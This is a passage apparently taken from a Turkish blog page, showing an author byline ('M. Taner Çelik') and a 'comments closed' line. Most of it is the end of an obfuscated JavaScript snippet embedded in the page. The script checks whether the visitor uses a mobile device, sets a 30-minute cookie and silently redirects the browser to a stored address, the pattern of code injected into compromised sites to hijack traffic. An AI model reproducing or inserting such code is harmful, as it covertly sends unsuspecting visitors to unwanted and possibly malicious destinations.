)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Hakkında M. Taner Çelik

Yoruma kapalı.